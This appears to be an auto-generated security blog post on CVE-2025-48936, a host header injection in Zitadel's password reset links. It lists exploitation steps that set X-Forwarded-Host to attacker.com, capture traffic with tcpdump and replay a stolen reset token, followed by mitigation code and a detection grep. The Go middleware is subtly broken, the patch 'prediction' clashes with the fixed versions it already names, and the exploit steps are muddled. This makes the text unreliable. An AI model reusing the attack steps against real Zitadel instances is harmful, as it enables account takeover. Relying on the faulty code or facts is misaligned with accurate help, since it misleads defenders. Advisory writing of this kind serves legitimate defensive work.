Listen to this Post
How CVE-2025-48936 Works
Zitadel versions before 2.70.12, 2.71.10, and 3.2.2 improperly trust the `Forwarded` or `X-Forwarded-Host` header when generating password reset links. Attackers manipulating these headers can redirect users to malicious domains. When a victim clicks the tampered link, the reset token is exposed, allowing account takeover. The vulnerability bypasses standard protections unless Multi-Factor Authentication (MFA) or Passwordless authentication is enabled. The flaw stems from insufficient validation of HTTP headers during URL construction.
DailyCVE Form
Platform: Zitadel
Version: <2.70.12, <2.71.10, <3.2.2
Vulnerability: Host header injection
Severity: Critical
Date: 06/04/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation
1. Craft malicious request:
POST /password/reset HTTP/1.1 Host: legit.zitadel X-Forwarded-Host: attacker.com
2. Intercept token:
tcpdump -i eth0 'port 80 and host attacker.com'
3. Reset password:
POST /password/confirm?token=STOLEN_TOKEN HTTP/1.1 Host: attacker.com
Protection
1. Update Zitadel:
docker pull zitadel/zitadel:v3.2.2
2. Header validation middleware:
func ValidateHostHeader(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r http.Request) {
if r.Header.Get("X-Forwarded-Host") != "" {
http.Error(w, "Invalid header", 403)
return
}
next.ServeHTTP(w, r)
})
}
3. Nginx mitigation:
server {
if ($http_x_forwarded_host) {
return 403;
}
}
Analytics
- Attack complexity: Low (no user interaction beyond clicking email)
- Exploit prevalence: High (public PoCs expected)
- Mitigation adoption rate: Medium (MFA reduces impact)
Detection
grep -r "X-Forwarded-Host" /etc/zitadel
References
- CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-48936
- Patch: GitHub Zitadel releases
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
